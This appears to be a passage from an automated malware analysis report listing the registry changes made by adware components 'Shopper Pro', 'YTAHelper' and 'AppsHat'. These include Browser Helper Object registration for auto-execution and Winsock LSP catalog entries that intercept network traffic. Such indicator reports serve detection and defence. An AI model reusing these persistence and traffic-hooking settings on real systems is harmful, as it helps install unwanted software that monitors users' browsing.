[HKCR\Interface\{5428DAA1-5A6B-4443-9CAD-60D5C2F38F1B}]
"(Default)" = "IYTAHelperBHO"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\0\win32]
"(Default)" = "C:\ProgramData\YTAHelper\YTAHelper.dll"

[HKCR\Wow6432Node\Interface\{5428DAA1-5A6B-4443-9CAD-60D5C2F38F1B}]
"(Default)" = "IYTAHelperBHO"

[HKCR\Wow6432Node\Interface\{5428DAA1-5A6B-4443-9CAD-60D5C2F38F1B}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\Wow6432Node\CLSID\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}\VersionIndependentProgID]
"(Default)" = "YTAHelper.YTAHelperBHO"

[HKCR\Wow6432Node\CLSID\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}\InprocServer32]
"ThreadingModel" = "Apartment"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}]

The process regsvr32.exe:3888 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCR\Wow6432Node\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "Shopper Pro"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\0\win32]
"(Default)" = "C:\ProgramData\ShopperPro\ShopperPro.dll"

[HKCR\Wow6432Node\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Wow6432Node\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\VersionIndependentProgID]
"(Default)" = "ShopperPro.ShopperProBHO"

[HKCR\Wow6432Node\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"(Default)" = "C:\ProgramData\ShopperPro\ShopperPro.dll"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\ShopperPro.ShopperProBHO\CurVer]
"(Default)" = "ShopperPro.ShopperProBHO.1"

[HKCR\AppID\{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}]
"(Default)" = "ShopperPro"

[HKCR\AppID\ShopperPro.DLL]
"AppID" = "{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}"

[HKCR\ShopperPro.ShopperProBHO]
"(Default)" = "Shopper Pro"

[HKCR\Wow6432Node\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"Version" = "1.0"

[HKCR\ShopperPro.ShopperProBHO.1\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"Version" = "1.0"

[HKCR\ShopperPro.ShopperProBHO\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}]
"(Default)" = "IShopperProBHO"

[HKCR\Wow6432Node\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\Wow6432Node\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\ShopperPro.ShopperProBHO.1]
"(Default)" = "Shopper Pro"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0]
"(Default)" = "ShopperPro 1.0 Type Library"

[HKCR\Wow6432Node\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\Wow6432Node\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}]
"(Default)" = "IShopperProBHO"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"

[HKCR\Wow6432Node\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\ProgID]
"(Default)" = "ShopperPro.ShopperProBHO.1"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"NoExplorer" = "1"

[HKCR\Interface\{03C0AC00-86DE-4B55-81BA-2E7CD61C51B1}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]

The process regsvr32.exe:3320 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCR\ShopperPro.ShopperProBHO]
"(Default)" = "Shopper Pro"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\VersionIndependentProgID]
"(Default)" = "ShopperPro.ShopperProBHO"

[HKCR\ShopperPro.ShopperProBHO.1\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\InprocServer32]
"(Default)" = "C:\ProgramData\ShopperPro\ShopperPro64.dll"
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\0\win32]
"(Default)" = "C:\ProgramData\ShopperPro\ShopperPro64.dll"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}\ProgID]
"(Default)" = "ShopperPro.ShopperProBHO.1"

[HKCR\CLSID\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "Shopper Pro"

[HKCR\ShopperPro.ShopperProBHO\CLSID]
"(Default)" = "{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}"

[HKCR\ShopperPro.ShopperProBHO\CurVer]
"(Default)" = "ShopperPro.ShopperProBHO.1"

[HKCR\AppID\ShopperPro.DLL]
"AppID" = "{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}"

[HKCR\AppID\{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}]
"(Default)" = "ShopperPro"

[HKCR\ShopperPro.ShopperProBHO.1]
"(Default)" = "Shopper Pro"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{A5A51D2A-505A-4D84-AFC6-E0FA87E47B8C}]
"(Default)" = "ShopperProBHO"

"NoExplorer" = "1"

The process regsvr32.exe:3060 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCR\YTAHelper.YTAHelperBHO.1]
"(Default)" = "YTAHelper"

[HKCR\TypeLib\{8FB1A663-2820-468B-95C4-5060A4C5F413}\1.0\0\win32]
"(Default)" = "C:\ProgramData\YTAHelper\YTAHelper64.dll"

[HKCR\CLSID\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}\InprocServer32]
"(Default)" = "C:\ProgramData\YTAHelper\YTAHelper64.dll"

[HKCR\YTAHelper.YTAHelperBHO.1\CLSID]
"(Default)" = "{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}"

[HKCR\AppID\YTAHelper.DLL]
"AppID" = "{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}"

[HKCR\CLSID\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}\ProgID]
"(Default)" = "YTAHelper.YTAHelperBHO.1"

[HKCR\YTAHelper.YTAHelperBHO\CLSID]
"(Default)" = "{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}"

[HKCR\YTAHelper.YTAHelperBHO\CurVer]
"(Default)" = "YTAHelper.YTAHelperBHO.1"

[HKCR\YTAHelper.YTAHelperBHO]
"(Default)" = "YTAHelper"

[HKCR\CLSID\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}]
"(Default)" = "YTAHelper"

[HKCR\AppID\{58FDA6AF-67D8-4198-B7CD-94B17532C8D5}]
"(Default)" = "YTAHelper"

[HKCR\CLSID\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}\VersionIndependentProgID]
"(Default)" = "YTAHelper.YTAHelperBHO"

[HKCR\CLSID\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}\TypeLib]
"(Default)" = "{8FB1A663-2820-468B-95C4-5060A4C5F413}"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{FCE3FA8B-BA81-467C-81D8-E43C00D1BC71}]
"(Default)" = "YTAHelperBHO"

"NoExplorer" = "1"

The process lspinst.exe:3356 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\fSXewhkfv]
"(Default)" = "_xYZQ`DvisWwj@pPX["

[HKLM\SOFTWARE\Wow6432Node\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\pseKcc]
"(Default)" = "LIekbRXX|SYWpfDD`L[A|sXNDUsk@"

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 7B A4 44 A3"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\cgcdxuSksc]
"(Default)" = "mA_vX[@|ipql`LRKtAe^~Eu"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\uqmpybcjdI]
"(Default)" = "K|KyRWolh|ac`_w}Yu`fbISI`@Ntl"

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{I3B3ED09D712B0615}" = "0E 00 00 00"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\FdUXjkIpvn]
"(Default)" = "R[vJVqJXaKuYLwWt"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\sehlsRMuplph]
"(Default)" = "}QJijLDlnGtvlM\Dt`mRLXE[tLli@u"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\Uojvoqeov]
"(Default)" = "F}FdcTzbnLZBznXQtn["

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\LdsE]
"(Default)" = "mncEDgoMD^EumhBjdoZbB"

The Malware deletes the following value(s) in system registry:

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}]
"sehlsRMuplph"
"wjxsvv"
"FdUXjkIpvn"
"jugyvwoEcjGw"
"Uojvoqeov"
"rffapxdttSchh"
"yxQHXfdfitoe"
"qPacydvhduuR"
"qvorsEtjxw"
"qvbbRNdMg"
"yEsrDTepOCs"
"cgcdxuSksc"
"MNEMOyZJWG"
"LdsE"
"fSXewhkfv"
"omdjT"
"hFLwn"
"DxOl"
"uqmpybcjdI"
"pseKcc"
"pxylOXnGwpXkz"

The process lspinst.exe:4156 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\fSXewhkfv]
"(Default)" = "_xYZQ`DvisWwj@pPX["

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{03B3ED09D712B0615}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 7B A4 44 A3"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
"ProtocolName" = "@%SystemRoot%\System32\wshtcpip.dll,-60101"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
"ProtocolName" = "@%SystemRoot%\System32\wshqos.dll,-100"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Wow6432Node\Licenses]
"{I3B3ED09D712B0615}" = "11 00 00 00"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
"ProtocolName" = "@%SystemRoot%\System32\wshqos.dll,-101"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Next_Catalog_Entry_ID" = "1022"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
"PackedCatalogItem" = "43 3A 5C 50 72 6F 67 72 61 6D 20 46 69 6C 65 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000018]
"PackedCatalogItem" = "43 3A 5C 50 72 6F 67 72 61 6D 20 46 69 6C 65 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
"ProtocolName" = "@%SystemRoot%\System32\wshqos.dll,-103"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
"ProtocolName" = "YTALSP"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
"ProtocolName" = "@%SystemRoot%\System32\wship6.dll,-60101"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Num_Catalog_Entries" = "13"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
"PackedCatalogItem" = "25 77 69 6E 64 69 72 25 5C 73 79 73 74 65 6D 33"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
"ProtocolName" = "@%SystemRoot%\System32\wship6.dll,-60100"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
"ProtocolName" = "@%SystemRoot%\System32\wshqos.dll,-102"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\uqmpybcjdI]
"(Default)" = "K|KyRWolh|acP_w}Yu`fRISI`@Ntl"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
"ProtocolName" = "YTALSP over [MSAFD Tcpip [TCP/IPv6]]"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000021]
"PackedCatalogItem" = "43 3A 5C 50 72 6F 67 72 61 6D 20 46 69 6C 65 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
"ProtocolName" = "YTALSP over [MSAFD Tcpip [UDP/IP]]"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\FdUXjkIpvn]
"(Default)" = "R[vJIqJXaK~vqbUT"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
"PackedCatalogItem" = "25 77 69 6E 64 69 72 25 5C 73 79 73 74 65 6D 33"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
"ProtocolName" = "VMCI sockets STREAM"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
"ProtocolName" = "YTALSP over [MSAFD Tcpip [TCP/IP]]"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000020]
"ProtocolName" = "YTALSP over [RSVP UDPv6 Service Provider]"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000019]
"ProtocolName" = "YTALSP over [RSVP TCP Service Provider]"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000018]
"ProtocolName" = "YTALSP over [RSVP TCPv6 Service Provider]"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
"PackedCatalogItem" = "43 3A 5C 50 72 6F 67 72 61 6D 20 46 69 6C 65 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Serial_Access_Num" = "19"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\cgcdxuSksc]
"(Default)" = "mA_vX[@|ipql`LRKtAe^~Eu"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
"PackedCatalogItem" = "43 3A 5C 50 72 6F 67 72 61 6D 20 46 69 6C 65 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
"PackedCatalogItem" = "43 3A 5C 50 72 6F 67 72 61 6D 20 46 69 6C 65 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000020]
"PackedCatalogItem" = "43 3A 5C 50 72 6F 67 72 61 6D 20 46 69 6C 65 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000019]
"PackedCatalogItem" = "43 3A 5C 50 72 6F 67 72 61 6D 20 46 69 6C 65 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000017]
"PackedCatalogItem" = "43 3A 5C 50 72 6F 67 72 61 6D 20 46 69 6C 65 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000021]
"LspCategories" = "1"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\sehlsRMuplph]
"(Default)" = "}QJijLDlnGtvlM\Dt`mRLXE[tLli@u"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
"ProtocolName" = "@%SystemRoot%\System32\wshtcpip.dll,-60102"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\LdsE]
"(Default)" = "mncEDgoMD^EumhBjdoZbB"

[HKLM\SOFTWARE\Wow6432Node\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000021]
"ProtocolName" = "YTALSP over [RSVP UDP Service Provider]"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000017]
"ProtocolName" = "YTALSP over [MSAFD Tcpip [UDP/IPv6]]"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
"ProtocolName" = "VMCI sockets DGRAM"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\pseKcc]
"(Default)" = "LIekbRXX|SYWpfDD`L[A|sXNDUsk@"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
"ProtocolName" = "@%SystemRoot%\System32\wshtcpip.dll,-60100"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
"ProtocolName" = "@%SystemRoot%\System32\wship6.dll,-60102"

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}\Uojvoqeov]
"(Default)" = "F}FdcTzbnLZBznXQtn["

The Malware deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000018]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000019]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000012]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000013]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000016]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000017]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000014]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000015]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000016]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000017]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000014]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000015]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000018]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000019]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000021]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000020]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000001B]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000001C]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\0000001A]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]

The Malware deletes the following value(s) in system registry:

[HKCR\Wow6432Node\CLSID\{52988E8B-7806-3101-0E6E-1189876F2078}]
"sehlsRMuplph"
"wjxsvv"
"FdUXjkIpvn"
"jugyvwoEcjGw"
"Uojvoqeov"
"rffapxdttSchh"
"yxQHXfdfitoe"
"qPacydvhduuR"
"qvorsEtjxw"
"qvbbRNdMg"
"yEsrDTepOCs"
"cgcdxuSksc"
"MNEMOyZJWG"
"LdsE"
"fSXewhkfv"
"omdjT"
"hFLwn"
"DxOl"
"uqmpybcjdI"
"pseKcc"
"pxylOXnGwpXkz"

The process YTAHEL~1.EXE:1600 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\install20087.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\DCytaiesmt_smtyc_setup.exe, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nst4867.tmp\, , \??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi9406.tmp\AccDownload.dll,"

The process appshat_generic.exe:3896 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecision" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History]
"CachePrefix" = "Visited:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDetectedUrl" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadDecisionTime" = "FD B6 3B 7D 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-50-56-f5-e5-a3]
"WpadDecisionTime" = "54 01 45 6E 30 7A D0 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"NoRepair" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content]
"CachePrefix" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"UninstallString" = "C:\Users\"%CurrentUserName%"\AppData\Local\AppsHat Mobile Apps\Uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{9BA14452-3A93-4712-8A0D-BF6CFCC6695B}]
"WpadNetworkName" = "Network 4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 5C 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\AppsHat Mobile Apps]
"DisplayName" = "AppsHat Mobile Apps"

